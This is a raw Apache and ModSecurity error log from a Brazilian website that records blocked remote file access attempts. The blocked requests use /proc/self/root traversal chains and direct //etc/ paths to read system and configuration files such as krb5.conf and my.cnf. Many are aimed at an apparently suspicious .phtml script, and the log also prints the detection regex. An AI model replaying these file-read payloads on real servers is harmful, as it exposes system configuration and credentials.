[Fri Mar 20 08:50:09.604813 2026] [mime_magic:error] [pid 9818:tid 140411574073088] (70014)End of file found: [client 216.73.216.191:39478] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:50:20.156202 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.243.128:45340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab00fPqxLDW4GITHUkTzFQAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:50:21.882165 2026] [mime_magic:error] [pid 21219:tid 140411616036608] (70014)End of file found: [client 216.73.216.191:40316] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:53:32.219667 2026] [mime_magic:error] [pid 31215:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:49496] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:53:32.991250 2026] [:error] [pid 9818:tid 140411599251200] [client 74.7.243.128:47950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab01PF1pVZ5mVmJwsFM72gAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:53:35.616677 2026] [:error] [pid 11167:tid 140411607643904] [client 74.7.243.128:50970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab01P_HIg5MgXLBnicMBOQAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:53:46.147969 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.243.128:50986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab01SvXLqtnMIWvjpaKlHQAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:53:48.681200 2026] [:error] [pid 31215:tid 140411582465792] [client 74.7.243.128:60082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab01TAF0L0L-SsrnPo5zXAAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:54:32.493106 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.243.128:48116] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab01ePqxLDW4GITHUkTz8QAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:54:38.647493 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.243.128:42070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab01fvqxLDW4GITHUkTz_AAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:54:40.056974 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.243.128:37194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab01gPXLqtnMIWvjpaKlMwAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:54:41.459478 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.243.128:37202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab01gRCii7xarUs8iHZx_gAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:55:00.935822 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:37208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab01lNa6ubjKNq_cu4bgtgAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:55:04.587324 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:57986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab01mNa6ubjKNq_cu4bgvAAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:55:06.766041 2026] [mime_magic:error] [pid 7235:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:53684] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:55:14.685693 2026] [:error] [pid 7893:tid 140411725141760] [client 57.141.18.37:54222] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01ohCii7xarUs8iHZyJwAAAgI"]
[Fri Mar 20 08:55:15.189762 2026] [:error] [pid 11167:tid 140411632822016] [client 57.141.18.9:54252] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01o_HIg5MgXLBnicMBdwAAAc0"]
[Fri Mar 20 08:55:15.747066 2026] [:error] [pid 21219:tid 140411683178240] [client 57.141.18.88:54298] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01o_XLqtnMIWvjpaKlYQAAAoc"]
[Fri Mar 20 08:55:16.188150 2026] [:error] [pid 31215:tid 140411674785536] [client 57.141.18.84:54324] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01pAF0L0L-SsrnPo5zkgAAAsg"]
[Fri Mar 20 08:55:17.898377 2026] [:error] [pid 31215:tid 140411632822016] [client 57.141.18.96:54342] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01pAF0L0L-SsrnPo5zkwAAAs0"]
[Fri Mar 20 08:55:17.899701 2026] [:error] [pid 11642:tid 140411616036608] [client 57.141.18.96:54358] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01pbninkcc-iUj5ApoMQAAA48"]
[Fri Mar 20 08:55:17.911214 2026] [:error] [pid 21219:tid 140411741927168] [client 57.141.18.13:54350] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01pPXLqtnMIWvjpaKlZAAAAoA"]
[Fri Mar 20 08:55:17.911492 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.76:54368] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01pfqxLDW4GITHUkT0HgAAAQo"]
[Fri Mar 20 08:55:18.151604 2026] [:error] [pid 7893:tid 140411708356352] [client 57.141.18.115:54400] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01phCii7xarUs8iHZyLAAAAgQ"]
[Fri Mar 20 08:55:18.287862 2026] [:error] [pid 26799:tid 140411708356352] [client 57.141.18.71:54402] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01pta6ubjKNq_cu4bgyQAAA0Q"]
[Fri Mar 20 08:55:18.475173 2026] [:error] [pid 26799:tid 140411565680384] [client 57.141.18.64:54428] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01pta6ubjKNq_cu4bgygAAA1U"]
[Fri Mar 20 08:55:19.020814 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.25:54434] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01pxCii7xarUs8iHZyLQAAAhU"]
[Fri Mar 20 08:55:19.369262 2026] [:error] [pid 7235:tid 140411624429312] [client 57.141.18.6:54454] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01p_qxLDW4GITHUkT0IAAAAQ4"]
